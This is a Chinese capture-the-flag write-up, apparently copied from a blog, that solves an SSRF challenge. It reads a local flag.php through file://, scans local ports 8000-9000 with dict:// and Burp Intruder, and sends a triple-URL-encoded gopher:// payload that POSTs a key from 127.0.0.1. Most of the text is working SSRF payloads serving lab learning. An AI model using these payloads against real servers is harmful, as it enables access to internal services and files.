标签:技术 www 使用 for c4c 长度 com url loading
url=file:///var/www/html/flag.php
通过dict协议用来探测开放的端口
构造payload: ?url=dict://127.0.0.1:端口号
题目说端口在8000-9000
使用Burp的intruder模块进行爆破
然后开始爆破就行了。
嗯,8692
访问flag.php,告诉我们必须要从本地访问
源代码有key
需要我们用gopher协议去用post key到flag.php,不过需要注意的是要从127.0.0.1发送数据。使用方法:gopher://ip:port/_payload(注意下划线)
POST /flag.php HTTP/1.1 Host: 127.0.0.1:80 Content-Type: application/x-www-form-urlencoded Content-Length: 36 key=d93819c4c1a18dc606dc5c6486f77227
特别要注意Content-Length应为字符串“key=d93819c4c1a18dc606dc5c6486f77227”的长度。
进行url三次编码即(注:第一次url编码后要手动在所有%0A前面加上%0D,再进行后续编码)
?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost:%2520127.0.0.1:80%250D%250AContent-Type:%2520application/x-www-form-urlencoded%250D%250AContent-Length:%252036%250D%250A%250D%250Akey=d93819c4c1a18dc606dc5c6486f77227
标签:技术 www 使用 for c4c 长度 com url loading
原文地址:https://www.cnblogs.com/tac2664/p/14350345.html
